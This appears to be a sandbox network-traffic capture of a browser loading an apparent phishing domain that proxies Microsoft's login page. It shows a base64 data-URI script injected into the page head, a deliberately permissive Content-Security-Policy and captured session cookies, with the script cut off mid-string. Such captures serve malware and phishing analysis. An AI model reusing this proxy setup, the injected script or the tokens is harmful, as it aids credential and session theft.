                                                        2025-03-17 16:42:45 UTC2655OUTGET /?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1 [TRUNCATED]
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N
                                                        2025-03-17 16:42:46 UTC2253INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: 35e22e39-6015-49ac-a079-dc6a8078fb00
                                                        x-ms-ests-server: 2.1.20203.6 - EUS ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-clitelem: 1,50168,0,,
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-KG_ViQ1qHUmXixmCu67BnQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; domain=hapiinenstys.criadordeconexoes.com.br; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: fpc=AjUAFJMlP0ZCgsS-Ll1segI; expires=Wed, 16-Apr-2025 16:42:45 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Mon, 17 Mar 2025 16:42:45 GMT
                                                        Connection: close
                                                        content-length: 22738
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:46 UTC14131INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47
                                                        Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG
                                                        2025-03-17 16:42:46 UTC8607INData Raw: 65 64 22 29 2c 6f 29 2c 68 28 65 2b 31 2c 74 2c 6e 29 3b 76 61 72 20 69 3d 77 5b 65 5d 2e 6f 6e 53 75 63 63 65 73 73 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 26 26 69 28 77 5b 65 5d 2e 73 72 63 50 61 74 68 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 6f 2c 69 29 7b 69 66 28 65 3c 77 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 61 3d 77 5b 65 5d 3b 69 66 28 21 61 7c 7c 21 61 2e 73 72 63 50 61 74 68 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 68 28 65 2b 31 2c 6f 2c 69 29 7d 61 2e 72 65 74 72 79 3e 30 26 26 28 61 2e 73 72 63 50 61 74 68 3d 6c 28 61 2e 73 72 63 50 61 74 68 29 2c 61 2e 6f 72 69 67 49 64 7c 7c 28 61 2e 6f 72 69 67 49 64 3d 61 2e 69 64 29 2c 61 2e 69 64 3d 61 2e 6f 72 69 67 49 64 2b 22 5f 52 65 74 72 79 5f 22 2b 61 2e 72 65 74 72
                                                        Data Ascii: ed"),o),h(e+1,t,n);var i=w[e].onSuccess;"function"==typeof i&&i(w[e].srcPath)}function h(e,o,i){if(e<w.length){var a=w[e];if(!a||!a.srcPath){return void h(e+1,o,i)}a.retry>0&&(a.srcPath=l(a.srcPath),a.origId||(a.origId=a.id),a.id=a.origId+"_Retry_"+a.retr


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.44975823.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:46 UTC2740OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA
                                                        2025-03-17 16:42:47 UTC1406INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:47 GMT
                                                        Content-Type: application/x-javascript
                                                        content-length: 142614
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 29 Jan 2025 22:53:23 GMT
                                                        ETag: 0x8DD40B7BBC6F429
                                                        x-ms-request-id: feef4c00-e01e-0009-6fb4-96f13a000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164247Z-r1769bfd58blqr42hC1YTOapcg000000054g00000000czsr
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:47 UTC14978INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc f0 36 04 66 66 17 58 2e 27 56 c0 dd c1 ce da 0e 34 13 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 c1 45 ef fc a2 72 fa b1 72 f1 f9 f0 fc a0 72 06 6f ff a8 9c 9c 5e 1c ee f7 7f bc 1e fc 28 fe 7f 71 ef c7 95 b1 3f 11 15 f8 1d ba b1 f0 2a 61 50 09 a3 8a 1f 8c c2 68 1a 46 6e 22 e2 ca 03 fc 8d 7c 77 52 19 47 e1 43 25 b9 17 95 69 14 7e 11 a3 24 ae 4c fc 38 81 42 43 31 09 9f 2a 55 a8 2e f2 2a 67 6e 94 3c 57 0e cf cc 3a d4 2f a0 36 ff ce 0f a0 f4 28 9c 3e c3 f3 7d 52 09 c2 c4 1f 89 8a 1b 78 54 db 04 5e 82 58 54 66 81 27 a2 ca d3 bd 3f ba af 1c fb a3 28 8c c3 71 52 89 c4 48
                                                        Data Ascii: m[80OL;w6ffX.'V4r~=,JUT~l?Errro^(q?*aPhFn"|wRGC%i~$L8BC1*U.*gn<W:/6(>}RxT^XTf'?(qRH
                                                        2025-03-17 16:42:47 UTC1406INData Raw: 10 03 ae f6 46 2c dd 9b fa 19 8b 39 73 5e 6c 98 c8 58 63 d1 b6 94 76 3c 8b 84 8d ab 7a 29 4b 45 77 31 26 b4 d4 16 44 7b 17 a0 95 c9 bd 4b db fd 87 cc e2 f0 c2 14 cb 61 bd 52 2e a9 cd b6 6d b1 65 9d 9d 9f 9e 7e 74 e6 14 d3 3f 27 57 1d e0 40 c5 da 01 c9 a1 6b a1 ad f4 23 a2 e2 c1 00 88 6b f0 eb a0 07 54 a4 8f 2f ed 58 04 4a fa e0 47 c9 bd 07 d2 7c 8f 42 cf 72 b3 25 93 91 8c 0a a6 6d 0c 4d 19 f9 7a 81 91 c1 09 d2 cf 52 a1 df 5a 48 4a 17 4f 21 98 8f 64 39 20 29 f1 2b b6 ae c9 c4 8c 72 18 b7 f0 68 b4 58 08 5e c5 a0 5a d4 36 dc 80 23 65 31 6e 56 39 10 69 09 a3 45 fb 2e e2 90 e6 30 d0 a2 c5 44 e0 55 c2 cf 18 46 cb 1f de 68 93 cc da e7 3b 5f 98 2e 88 60 0c 37 d3 ad 37 bf 40 4a a7 82 47 a6 c4 22 71 66 c9 78 63 97 f7 ca 5c 46 93 7e 80 ab 38 5e be c0 b7 8d a7 a7 a7
                                                        Data Ascii: F,9s^lXcv<z)KEw1&D{KaR.me~t?'W@k#kT/XJG|Br%mMzRZHJO!d9 )+rhX^Z6#e1nV9iE.0DUFh;_.`77@JG"qfxc\F~8^
                                                        2025-03-17 16:42:47 UTC7569INData Raw: 1e 7d 7a 24 3b 22 b1 f4 26 db 11 50 6f 80 e8 c1 93 b1 e5 8e 2e a0 19 ce 2e 20 89 b1 02 fc 4b b7 b5 98 85 33 0f ab 46 92 12 01 25 b0 5b c3 c0 3b 5a 92 7a 69 9e b3 06 9c 90 68 ed 74 f4 97 97 97 48 3b 69 aa 8e 1a 9a 35 7f 84 39 0e 65 df c4 86 26 71 9d aa 2b c9 42 f6 43 4e 19 17 a0 2c 7e 08 bf fd b7 bd ba 4f cf a4 92 5d c9 12 9c 48 3b b1 aa 8e 53 22 76 07 25 fa 91 ff e0 83 0e c4 ca 15 6e 54 c7 a9 ed f7 7b b5 fc 14 0f 92 70 6a ac 42 bb bc b3 8d 33 0f 0f ff d3 7e ac 68 26 9e a4 f5 43 78 ca 35 43 6d 05 ff ff b6 2d 78 b8 d7 5f 6e 8b 04 e5 5b d8 72 24 b0 42 d4 cf 15 9f 08 9d 3f 82 32 fa ca 1a 6a 27 dd a5 d1 b5 97 1a 4f 24 c7 57 d5 a1 f6 b5 24 10 55 c3 00 15 c6 f7 c1 0c 2b 2f 89 43 25 89 c3 ab 44 49 e2 50 97 c4 a6 95 49 09 c7 ab 1a ea d9 90 19 bc 41 0d e4 90 4b b5
                                                        Data Ascii: }z$;"&Po.. K3F%[;ZzihtH;i59e&q+BCN,~O]H;S"v%nT{pjB3~h&Cx5Cm-x_n[r$B?2j'O$W$U+/C%DIPIAK
                                                        2025-03-17 16:42:47 UTC8815INData Raw: 6f 73 ef de df b6 91 a4 8d fe 7f 3e 05 85 f5 cf 06 42 08 96 9c 64 26 01 8d f0 e7 c8 f6 c4 99 f8 b2 96 9d 64 46 d6 68 41 02 94 60 51 00 07 00 25 6b 24 7e f7 53 4f 55 77 a3 71 a1 ec cc ce 39 ef 3b bb b1 40 a0 d1 e8 6b 75 5d 9f 6a ad 57 35 88 7b 8f bb ce 2c 53 b7 c6 79 50 1f 5d 1d 37 1e 24 30 fc 80 f2 04 d7 31 b8 10 7a 16 d9 cf fc 3a f8 14 43 87 ce 8c 5d e8 a2 79 f3 39 cb fa 54 d4 18 08 f8 bd 54 11 0f 51 f0 0b d1 21 72 26 04 42 13 0a 66 12 85 cc 80 77 f4 df d8 e1 27 36 24 08 48 d0 bb 38 d0 d2 97 98 98 89 22 f2 d0 bc 89 6e ba 34 1d c0 57 5b b8 17 6a dc c6 ff d4 5a 8d 7c 2c f4 45 1f 55 9a 68 2b 12 69 08 90 dc dd 45 61 ed fe 43 35 b7 8f 72 26 f0 5b 29 ee 1b 3d 78 dc e9 77 11 26 3e 78 19 2b 0f 1e 05 db e1 4c de 1c bd 3b e6 67 54 fc 75 d4 a1 40 6e 3a 24 50 c3 6c
                                                        Data Ascii: os>Bd&dFhA`Q%k$~SOUwq9;@ku]jW5{,SyP]7$01z:C]y9TTQ!r&Bfw'6$H8"n4W[jZ|,EUh+iEaC5r&[)=xw&>x+L;gTu@n:$Pl
                                                        2025-03-17 16:42:47 UTC16384INData Raw: d3 94 33 40 fa 50 27 1b dc 6a 63 35 9e e4 03 66 e1 51 81 c5 87 2a 1c 73 26 f2 fb 53 ee 81 75 50 e6 42 b8 d4 e8 98 fb ad e1 71 79 89 b2 f7 cd 46 65 5f 72 44 eb da 1c 76 93 2e 13 a0 f7 a9 9c fb fa 57 9f 59 c8 aa b7 0d c5 50 84 a2 5f aa d9 f7 4e 87 0e f4 cb 2a da 2c 5c a5 a3 88 80 67 33 3a 62 de b3 1f 24 49 14 df c5 98 c8 94 97 3d 6f 3b 96 84 11 81 a2 93 98 0d 7a 97 95 d0 53 0c 78 97 f9 ad 78 20 49 21 5a 44 ae 28 77 fe 12 bb e5 20 68 1f 54 fa 75 cb e2 a4 c0 76 fa 6f 68 5b e4 a5 05 ff 2c 5a 76 54 22 39 23 87 0d fa 70 f1 05 fd 92 7c 92 1c 9c 03 c7 e1 b6 40 e2 31 95 e5 36 20 f5 70 13 32 ff 85 92 a0 03 bb 06 23 eb 14 6c e2 88 ca 26 a4 fe 06 37 c2 9b cd 66 73 87 13 e3 80 71 5b f3 4d d6 e9 c5 1e e3 b0 31 d7 26 c6 d2 d9 c5 67 4d 02 28 50 37 b5 07 14 41 3a a6 6d e9
                                                        Data Ascii: 3@P'jc5fQ*s&SuPBqyFe_rDv.WYP_N*,\g3:b$I=o;zSxx I!ZD(w hTuvoh[,ZvT"9#p|@16 p2#l&7fsq[M1&gM(P7A:m
                                                        2025-03-17 16:42:47 UTC833INData Raw: 05 07 91 33 19 21 5e 37 7a 38 19 25 cc 39 44 ce f8 6c ec 9e 4e 1d 27 a4 67 55 3a 27 d1 9a 46 df bd 8e aa 1e 58 da fc 6c f7 8b 0e 6e a0 87 b8 5c c3 60 d2 07 46 e4 f9 d2 ba 90 f6 87 0e 9b 16 a6 cd b5 24 1d 50 64 61 30 25 61 41 ac 43 46 ac 03 92 cb 48 46 09 f8 0f 14 e2 9a 65 11 f5 28 93 5b f6 96 04 0c 0c ee 69 67 b6 7e ae 13 a7 4f 9c 79 1b e3 fc 2a b0 9c bd b1 03 6b a8 9b f1 0f 4d 86 d8 31 72 1c 39 23 57 59 4b 6d 53 61 ec 21 02 19 84 45 7f dd f6 b6 1b 68 c3 ab 27 8e a0 81 83 9d e5 92 f1 22 65 a5 11 a3 7a e0 43 b7 ce b8 50 6e d3 f1 74 c0 0f b9 fd 7d 8f 5d cd 70 a6 0f d5 59 7b aa f5 54 69 6d fc 52 52 0e 30 d6 1e 52 c9 76 fe 72 5f 79 75 81 bf 54 8c 25 b0 1f d4 f6 19 f4 b2 d2 06 26 85 d2 4c bc 27 92 db e7 c4 67 96 3d ee 52 7f 68 48 9e ed 81 ff b7 73 a4 e3 8d c2
                                                        Data Ascii: 3!^7z8%9DlN'gU:'FXln\`F$Pda0%aACFHFe([ig~Oy*kM1r9#WYKmSa!Eh'"ezCPnt}]pY{TimRR0Rvr_yuT%&L'g=RhHs


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.44976523.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:48 UTC3991OUTGET /?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1 [TRUNCATED]
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
